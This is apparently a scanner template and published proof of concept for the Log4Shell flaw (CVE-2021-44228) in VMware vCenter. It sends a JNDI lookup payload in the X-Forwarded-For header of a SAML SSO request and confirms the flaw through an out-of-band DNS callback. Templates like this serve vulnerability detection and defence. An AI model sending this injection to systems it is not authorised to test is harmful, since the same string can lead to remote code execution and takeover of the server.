VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
PoC代码[已公开]
id: vmware-vcenter-log4j-jndi-rce-temp
info:
name: VMware VCenter - Remote Code Execution (Apache Log4j)
author: _0xf4n9x_
severity: critical
verifed: true
description: |
VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://twitter.com/tnpitsecurity/status/1469429810216771589
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware
created: 2023/07/02
set:
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: GET
path: /websso/SAML2/SSO/vsphere.local?SAMLRequest=
headers:
X-Forwarded-For: "${jndi:ldap://{{oobDNS}}}"
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()